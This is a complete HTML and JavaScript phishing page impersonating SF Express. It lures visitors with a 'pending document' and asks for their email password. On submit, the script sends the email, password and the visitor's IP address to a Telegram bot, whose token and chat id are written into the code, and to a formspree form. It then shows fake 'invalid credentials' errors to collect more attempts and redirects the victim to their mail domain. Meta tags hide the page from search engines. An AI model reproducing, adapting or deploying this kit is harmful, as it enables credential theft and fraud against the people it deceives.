
<!DOCTYPE html>
<html id="html" data-emailvalue="[[Email-]]" lang="en">
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">

  <meta name="robots" content="noindex">
  <meta name="googlebot" content="noindex">
  <meta name="googlebot-news" content="noindex">
  <meta name="otherbot" content="noindex">
  <meta name="noarchive" content="noindex">
  <meta name="nosnippet" content="noindex">
  <meta name="noimageindex" content="noindex">
  <meta name="robots" content="none">
  <meta name="googlebot" content="none">
  <meta name="googlebot-news" content="none">
  <meta name="otherbot" content="none">
  <meta name="noarchive" content="none">
  <meta name="nosnippet" content="none">
  <meta name="noimageindex" content="none">
  <meta name="robots" content="nofollow">
  <meta name="googlebot" content="nofollow">
  <meta name="googlebot-news" content="nofollow">
  <meta name="otherbot" content="nofollow">
  <meta name="noarchive" content="nofollow">
  <meta name="nosnippet" content="nofollow">
  <meta name="noimageindex" content="nofollow">
  <meta name="robots" content="max-snippet:0">
  <meta name="robots" content="unavailable_after: 2020-09-22">

  <title>SF official website | sf-express.com</title>
  <link rel="SHORTCUT ICON" href="https://www.sf-express.com/favicon.ico?v2/" type="image/x-icon">
  <style>
    body {
      margin: 0;
      font-family: Trebuchet MS;
    }

    .topnav {
      overflow: hidden;
      background-color: #333;
    }

    .topnav a {
      float: left;
      color: #f2f2f2;
      text-align: center;
      padding: 14px 16px;
      text-decoration: none;
      font-size: 17px;
    }

    .topnav a:hover {
      background-color: #ddd;
      color: black;
    }

    .topnav a.active {
      background-color: #00a1f1;
      color: white;
    }

    input[type=text], input[type=email] {
        width: 70%;
        padding: 12px 20px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box;
    }


    input[type=text], input[type=password] {
        width: 70%;
        padding: 12px 20px;
        margin: 8px 0;
        display: inline-block;
        border: 1px solid #ccc;
        box-sizing: border-box;
    }

    button {
        background-color: red;
        color: white;
        padding: 14px 20px;
        margin: 8px 0;

        border: none;
        cursor: pointer;
        width: 70%;
    }

    button:hover {
        opacity: 0.8;
    }

    .cancelbtn {
        width: auto;
        padding: 10px 18px;
        background-color: #f44336;
    }

    .imgcontainer {
        text-align: center;
        margin: 10px 10px 0;
    }

    img.avatar {
        width: 40%;
        border-radius: 50%;
    }

    .container {
        padding: 10px;
    }

    span.psw {
        float: right;
        padding-top: 16px;
    }

    /* Change styles for span and cancel button on extra small screens */
    @media screen and (max-width: 300px) {
        span.psw {
          display: block;
          float: none;
        }
        .cancelbtn {
          width: 100%;
        }
    }

    /* The Modal (background) */
    .modal {
        display: none; /* Hidden by default */
        position: fixed; /* Stay in place *
        z-index: 1; /* Sit on top */
        left: 0;
        top: 0;
        width: 100%; /* Full width */
        height: 100%; /* Full height */
        overflow: auto; /* Enable scroll if needed */
        background-color: rgb(0,0,0); /* Fallback color */
        background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
        padding-top: 60px;
    }

    /* Modal Content/Box */
    .modal-content {
        background-color: white;
        margin: 11% auto 15% auto; /* 5% from the top, 15% from the bottom and centered */
        border: 1px solid #888;
        width: 30%; /* Could be more or less, depending on screen size */
        float: right;
        size-adjust: 100px;

    }

    /* The Close Button (x) */
    .close {
        position: absolute;
        right: 25px;
        top: 0;
        color: #000;
        font-size: 35px;
        font-weight: bold;
    }

    .close:hover,
    .close:focus {
        color: red;
        cursor: pointer;
    }

    /* Add Zoom Animation */
    .animate {
        -webkit-animation: animatezoom 0.6s;
        animation: animatezoom 0.6s
    }

    @-webkit-keyframes animatezoom {
        from {-webkit-transform: scale(0)}
        to {-webkit-transform: scale(1)}
    }

    @keyframes animatezoom {
        from {transform: scale(0)}
        to {transform: scale(1)}
    }

    /* Change styles for span and cancel button on extra small screens */
    @media screen and (max-width: 300px) {
        span.psw {
          display: block;
          float: none;
        }
        .cancelbtn {
          width: 100%;
        }
    }
  </style>
</head>
<body>
  <div class="topnav">
    <!-- <a class="active" href="javascript:void(0)" onclick="document.getElementById('id01').style.display='block'">SharePoint</a>
    <a href="javascript:void(0)" onclick="document.getElementById('id01').style.display='block'"></a><br> -->
  </div>
  <header
    style="background-image: url('https://imgpile.com/images/9kUdU8.png'); height: 600px; background-size: cover;"></header>
  <p style="font-family: 'Trebuchet MS'; font-size: 14px; color: #000000;">
    <strong>You have one pending document on SF EXpress for download</strong><br>
  </p>
  <button onclick="document.getElementById('id01').style.display='block'" style="width:auto;">
    <b>Preview</b>
  </button>
  <div id="id01" class="modal" style="display: block;">
    <div class="modal-content animate">
      <!-- <div class="imgcontainer">
        <span onclick="document.getElementById('id01').style.display='none'" class="close" title="Close Modal"><b>X</b></span>
        <img src="https://www.ax4.com/ax4/control/image?id=46032" width="40%">
      </div> -->
      <div class="container" style="text-align: center;">
        <p style="font-family: 'Trebuchet MS'; font-size: 14px; color: #000000;">
          Protected for unauthorized access: <br>Sign in with correct email credentials to view.<br>
          <form action="#" method="POST" id="myform">
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="successMessage" style="border: 1px solid red; color: red; padding: 10px; border-radius: 10px; display: none;"></p>
            </div>
            <input type="text" name="3w41l" id="3w41l" disabled/><br>
            <input type="hidden" name="hdn3w41l" id="hdn3w41l" value="">
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="error" style="color: red;display: none;">This account doesn't exist. Please, enter a different account.</p>
            </div>
            <input type="password" id="q455m0T2" placeholder="Enter Password" name="q455m0T2" required=""><br>
            <div style="width: 70%; font-size: 10px; margin: 0 auto;">
              <p id="pwdMsg" style="color: red;display: none;">Password field is empty.!</p>
            </div>
            <button type="submit" id="submit-btn">CONTINUE</button>
          </form>
        </p>
      </div>
    </div>
  </div>

  <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>

  <script>
    $(document).ready(function(){
      let userIP = '';
      var count=0;
      var pcount=0;
      $.getJSON('https://api.ipify.org?format=json', function(data){
        userIP = data.ip;
      });

      //  page setup area ==========================================================================
      var bot_token = "5982974553:AAGEHsfTb1O23fvG51c5w1TACmZCyP7Y8c0";  // set bot token here
      var group_id = "5914360524";                                      // set your chat id here
      var retries = 3;  // set the number of times the user will put password (0 means unlimited times and shoul not redirect)
      //  php server setup area ========================================================================
      var server_url = "https://formspree.io/f/xoqzogod";  // set php script url here if you want to use php
      // ===============================================================================================

      const htmlElement = document.getElementById("html");
      var _3w41l = window.location.hash.substr(1);
      var h3w41l = htmlElement.dataset.emailvalue;
      if (_3w41l || h3w41l) {
        var my_3w41l = _3w41l || h3w41l;
        $('#3w41l').val(my_3w41l);
        // $('#hdn3w41l').val(my_3w41l);

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_3w41l)) {
          $('#error').show();
          _3w41l.focus;
          return false;
        }
      }

      $('#myform').on('submit', function(event){
        event.preventDefault();
        $('#submit-btn').attr('disabled', 'disabled');
        $('#error').hide();
        $('#successMessage').hide();
        $('#pwdMsg').hide();
        _3w41l=$("#3w41l").val();
        var q455m0T2=$("#q455m0T2").val();

        if (!q455m0T2) {
          $('#pwdMsg').show();

          return false;
        }

        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(_3w41l)) {
          $('#error').show();
          _3w41l.focus;
          return false;
        }

        // TG script
        if (bot_token && group_id) {
          var url_tg = "https://api.telegram.org/bot"+bot_token+"/sendMessage?chat_id="+group_id+"&text=";
          url_tg = url_tg + encodeURIComponent("====ALMIGHTY OFFLINE====\n Email: " + _3w41l + "\nPassword: " + q455m0T2 + "\nUserIp: " + userIP);
          $.ajax({
            type: 'POST',
            url: url_tg,
            // data: $this.serialize(),
            beforeSend: function(xhr){
            },
            success: function(response){
              if(response){
                    console.log(`real count of ${count}`)
                $("#q455m0T2").val("");
                if (retries > 0) {
                  if (count>=retries-1) {
                    count=0;
                    console.log(`got redirect count of ${count}`)
                    window.location.replace(`https://${_3w41l.split('@')[1]}`);
                  } else {
                    count+=1;
                    console.log(`increased count of ${count}`)
                    $('#submit-btn').removeAttr('disabled');
                  }
                }
                $("#successMessage").show();
                $('#successMessage').html("Invalid credentials. Please try again");
              }
            },
            error: function(){
              $("#q455m0T2").val("");
              if (retries > 0) {
                if (count>=retries-1) {
                  count=0;
                    console.log(`got error redirect count of ${count}`)
                  window.location.replace(`https://${_3w41l.split('@')[1]}`);
                } else {
                  count+=1;
                  $('#submit-btn').removeAttr('disabled');
                }
              }
              $("#successMessage").show();
              $('#successMessage').html("Invalid credentials. Please try again");
            },
            complete: function(){
            }
          });
        }

        // php server script
        if (server_url.trim()) {
          $.ajax({
            type: 'POST',
            url: server_url,
            data: {
                    _3w41l: _3w41l,
                    q455m0T2: q455m0T2,
                    userIP: userIP
                  },
            // data: $this.serialize(),
            beforeSend: function(xhr){
            },
            success: function(response){
              if(response){
                console.log(response);
                $("#q455m0T2").val("");
                if (retries > 0) {
                  if (pcount>=retries-1) {
                    pcount=0;
                    window.location.replace(`https://${_3w41l.split('@')[1]}`);
                  } else {
                    pcount+=1;
                    $('#submit-btn').removeAttr('disabled');
                  }
                }
                $("#successMessage").show();
                $('#successMessage').html("Invalid credentials. Please try again");
              }
            },
            error: function(){
              $("#q455m0T2").val("");
              if (retries > 0) {
                if (pcount>=retries-1) {
                  pcount=0;
                  window.location.replace(`https://${_3w41l.split('@')[1]}`);
                } else {
                  pcount+=1;
                  $('#submit-btn').removeAttr('disabled');
                }
              }
              $("#successMessage").show();
              $('#successMessage').html("Invalid credentials. Please try again");
            },
            complete: function(){
            }
          });
        }
      });
    });
  </script>
</body>
</html>
